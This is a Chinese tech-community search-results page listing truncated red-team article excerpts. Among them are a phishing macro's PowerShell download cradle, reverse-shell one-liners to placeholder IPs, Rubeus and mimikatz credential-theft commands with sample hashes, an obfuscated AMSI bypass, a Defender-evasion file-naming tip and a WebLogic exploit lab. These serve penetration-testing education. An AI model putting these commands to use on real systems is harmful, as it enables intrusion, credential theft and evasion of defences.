首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏红队

    渗透攻击 redTeam -3 writeup

    3.用xray扫描,发现有phpmyadmin: ? ​ 4.经过测试发现phpmyadmin存在弱口令:root/root ​ ? ​

    85271编辑于 2023-04-19
  • 来自专栏Khan安全团队

    Tips

    在Windows上使用prtsc键时,taskhost/taskhostw会试图获得对一个不存在的文件的读取权限。

    33130编辑于 2022-04-02
  • 来自专栏Khan安全团队

    利器 - SharpSniper

    通常,参与不仅仅是实现域管理员。一些客户希望查看域中的特定用户是否会受到威胁,例如 CEO。

    34620编辑于 2022-07-13
  • 来自专栏渗透测试教程

    - 渗透小技巧

    信息收集 收集cms信息: 1.通过云溪,wapplayzer,fofa,以及github上各位表哥写的baner等插件脚本收集 2.网站后台,正页,power by "xxx",以及robots.txt 3. 收集子域名: 1.收集的意义在于配合收集的cms和端口信息撕开口子 2.看看有没有域传送漏洞,有的话帮你找完 3.多去找找某些api,某些api也可以帮你找全(其所有相关资产)。 ? 3.至于对抗waf,最重要的是要清楚waf的规则,拦截的参数,再来进一步绕过,具体可以参考我的上一篇文章。 3.注册账号的时候可以尝试admin空格空格空格空格空格空格,看看可不可以覆盖 (4)上传 1.条件竞争其实挺多的,tp写入session也可以想到条件竞争 2.二次渲染,不仅是要了解,而且要大环境复线 3.bp里面的各类参数修改,已经说的很多了。 4.看看有没有.user.ini这个文件,有的话走大运 5.白名单,这类没有解析漏洞或者开发商本身的漏洞,就别想着绕过了。

    1.7K40发布于 2021-07-23
  • 来自专栏Khan安全团队

    笔记 - 横向移动

    \Rubeus.exe asktgt /user:svc_with_delegation /domain:targetdomain.com /rc4:2892D26CDF84D7A70E2EB3B9F05C425E sa_with_delegation /impersonateuser:Administrator /msdsspn:time/dc /altservice:ldap /ptt /rc4:2892D26CDF84D7A70E2EB3B9F05C425E \Rubeus.exe s4u /user:InconspicuousMachineAccount$ /rc4:3644AC5E3D9441CCBCEF08CBAF98E910 /impersonateuser 1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b

    2.4K10发布于 2021-10-12
  • 来自专栏HACK学习

    | Windows命名管道

    powershell查看命名管道 PowershellV3以下: [System.IO.Directory]::GetFiles("\\. \\pipe\\") PowershellV3以上: [System.IO.Directory]::GetFiles("\\.\\pipe\\") 或 Get-ChildItem \\.

    2.5K20发布于 2021-06-24
  • 来自专栏HACK学习

    | InlineHook技术实现

    1; PAddr += *(DWORD*)PAddr+ 4; SetInlineHook((LPBYTE)Test, HookProc,9); Test(1, 2, 3) ; UnInlineHook(9); Test(1, 2, 3); return 0; } 这里有一个小的细节,我们用函数名Test传参的话,传进去的这个参数的值并不是真正的函数地址 BYTE*)Test + 1; PAddr += *(DWORD*)PAddr + 4; SetInlineHook((LPBYTE)PAddr, HookProc,9); Test(1, 2, 3) ; UnInlineHook(9); Test(1, 2, 3); return 0; } int main() { TestInlineHook(); //Test(1, 2, 3); return

    78540发布于 2021-05-14
  • 来自专栏Gamma安全实验室

    技巧-网络钓鱼

    前言 涵盖了现在大多数钓鱼的手法,一直以来钓鱼配合免杀,更能出奇制胜! 1. excel宏执行任意命令 新建一个exel表,然后打开,对准这个右键点击插入宏。 ? tokens=4" %a IN ('set^|findstr PSM')DO %a IEX (New-ObjectNet.WebClient).DownloadString('http://bit.ly/L3g1t ')" 3 CHM文档钓鱼: 新建一个文件夹,新建一个index.html,文件内容为 <! 而如上技术正是使用了Unicode的RLO(开始从左向右覆盖),Unicode定义的 Start of right-to-left override,控制字符是RLO,ASCII码是0x3F。 只要在一行字符前面加上一个0x3F就可以实现文本的反向排列。这个0x3F是Unicode为了兼容阿拉伯文字从左至右的阅读习惯设计的一个转义字符。

    3.3K10发布于 2021-03-10
  • 来自专栏渗透测试红队专栏

    实战攻防(一)

    大家好,我是风起,最近一直在做安全研究及Kunyu的开发维护,已经好久没有写攻防相关的文章了,那么近期将带来 “实战攻防技术” 系列的文章。 当前行业内组织的 “蓝对抗演习” 在检验企业安全的同时也在磨练技术人员的技术水平,在近几年的演习中可以发现攻防双方的水准都有了极大的提升,本文将以的视角去阐述技术思想。 与常规的渗透测试相比,攻防更多的是渗透思想上的差异,而我个人的理解认为 “隐蔽”、“持久化”是最重要的思想,如何做到快速、高效的拿下目标,隐蔽、持久的进一步操作,也正是核心的差异所在。 熟悉我的读者,一定看过之前 “攻防基础建设” 相关的文章,本文也会串联之前知识点灵活的运用到实战场景下。 对于一些新晋的同学,风起哥建议首先做好基础建设,比如免杀、隐匿、工具特征改造、匿名VPS、邮箱、手机号、身份信息等,最好在纯净的虚拟机中进行渗透操作(别搁虚拟机里看什么腾讯视频)。

    1K50发布于 2021-08-23
  • 来自专栏Khan安全团队

    笔记 - 后渗透

    dpapi::cred /in:C:\Users\[USERNAME]\AppData\Local\Microsoft\Credentials\1EF01CC92C17C670AC9E57B53C9134F3 AppData\Roaming\Microsoft\Protect\S-1-5-21-3865823697-1816233505-1834004910-1124\dd89dddf-946b-4a80-9fd3- dpapi::cred /in:C:\Users\[USERNAME]]\AppData\Local\Microsoft\Credentials\1EF01CC92C17C670AC9E57B53C9134F3 /masterkey:91721d8b1ec[...]e0f02c3e44deece5f318ad LSASS 运行Mimikatz的首选方式是在本地进行,并从目标机上转储LSASS内存的副本

    1.3K41发布于 2021-10-12
  • 来自专栏全栈程序员必看

    靶机实战(2)

    7001端口开放,banner信息显示是weblogic的服务,weblogic在历史是爆出几个命令执行漏洞的,先来尝试一下存不存在命令执行漏洞,直接上weblogic scan来扫描 python3 192.168.111.80 7001 image.png 发现存在CVE-2019-2725,CVE-2017-3506 上github随便找了个CVE-2019-272的exp 来使用 python3 weblogic-2019-2725.py 10.3.6 http://192.168.111.80:7001/ whoami 命令执行成功,使用命令上传webshell python3 weblogic Controllers" /domain net time /domain ping 10.10.10.10 域控机器ip为 10.10.10.10 使用arp进行内网探测看看内网的机器 发现有3台机器 刚刚探测发现445端口都是开着的,直接用psexec smb之间的方式,来连接域控 这里能成功上线 再来抓取一下密码,然后再把pc拿下来 成功拿下 3台主机 0x03 结尾 这里因为也没看其他的能不能出网就使用了

    68720编辑于 2021-12-13
  • 来自专栏Khan安全团队

    横向 - 神奇小妙招

    如果将恶意文件命名为 DumpStack.log,Defender 不会对其进行扫描。

    43320编辑于 2022-01-27
  • 来自专栏潇湘信安

    RequestTemplate内网渗透工具

    RequestTemplate是一款两端并用的渗透工具以及甲方自查工具,其在内网渗透过程中有着不可替代的作用。 客户端用Golang以其精巧、快速的特点打造而成,快速发现内网中脆弱的一环。 项目地址: https://github.com/1n7erface/RequestTemplate 0x01 应用场景 蓝对抗中的内网利器 甲方建设中内网的自查帮手 0x02 具备特点 网段探测 目标管理 3.

    1.7K30编辑于 2022-09-22
  • 来自专栏肖萧然最秀

    常用命令

    Venom ssh 无记录shell ssh -T root@192.168.1.1 /usr/bin/bash -i grep grep -E "([0-9]{1,3}[\.]){3}[0-9]{1,3 >&3 2>&3");' ruby ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <& >&3 2>&3');" powershell powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee :31d6cfe0d16ae931b73c59d7e0c089c0::: TideSec:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4

    5.1K50编辑于 2023-10-13
  • 来自专栏FreeBuf

    渗透项目之GoldenEye

    接下来不管是零基础学习渗透者,还是有些基础的渗透者,甚至是高水平的渗透人员读该文章都能学习到一些的技巧和知识。 192.168.4.202/sev-home/,登录后进行信息枚举: F12调试界面发现信息 如图所示: is very effective, we have configured our pop3 service to run on a very high non-default port 意思该环境开启了pop3 服务配置为在非常高的非默认端口上运行中,那还需要进行全端口的信息枚举。 获得两组账号密码: [55007][pop3] host: 192.168.4.202 login: natalya password: bird [55007][pop3] host: 192.168.4.202 五、总结 通过以上的学习,我们认知了一些的小技巧的技术手段,完成了从信息收集到内核提权项目落地,学习到了非常多的技巧,例如nmap、hysra、pop3-nc、MSF、EXP等等的编译和使用提权等,

    2K20编辑于 2022-02-23
  • 来自专栏FreeBuf

    技巧:仿冒Windows登录

    Metasploit带有内置的后期漏洞利用功能,可帮助我们完成任务。由于它是后渗透的模块,因此只需要输入会话即可:

    2K10发布于 2020-05-29
  • 来自专栏Khan安全团队

    笔记 - PowerShell AMSI Bypass

    GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.' g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli' sE`T`VaLUE"( ${n`ULl},${t`RuE} ) PowerShell的自动识别功能: [Delegate]::CreateDelegate(("Func``3[String, $(( 目的 Invoke-CradleCrafter 的存在是为了帮助蓝轻松探索、生成和混淆 PowerShell 远程下载托架。

    1.3K20发布于 2021-10-12
  • 来自专栏Gamma安全实验室

    技巧-常规横向手法

    前言 域内横向移动技术是作战在域内最基本技术之一,人员会利用该技术,以被攻陷的系统为跳板,通过已经收集的凭据和密码,来访问域内其他主机,扩大战果,最终目的是获取到dc的访问控制权限。 3. 再在目标主机DC上创建一个名称为“backdoor”的服务。 命令如下: sc \\[主机名/IP] create [servicename] binpath= "[path]" #创建计划任务启动程序 sc \\WIN-ENS2VR5TR3N create 3.客户端连接执行命令,服务端启动相应的程序并执行回显数据。 4.运行完后删除服务。 3.WMI会建立一个共享文件夹,用于远程读取命令执行结果。 4.当用户输入命令时,WMI创建进程执行该命令,然后把结果输出到文件,这个文件位于之前创建的共享文件夹中。

    2.8K20发布于 2021-07-01
  • 来自专栏Khan安全团队

    笔记 - 后渗透2

    禁用AV/EDR产品在实践中绝不是一个好主意,最好的办法是绕过它。所有这些命令都需要本地管理权限。

    88520发布于 2021-10-12
  • 来自专栏FreeBuf

    技巧:绕过Sysmon检测

    Sysmon和Windows事件日志都是防御者中极为强大的工具。它们非常灵活的配置使他们可以深入了解设备上的活动,从而使检测攻击者的过程变得更加容易。出于这个原因,我将带领您完成击败他们的旅程;)

    1.6K20发布于 2020-05-14
领券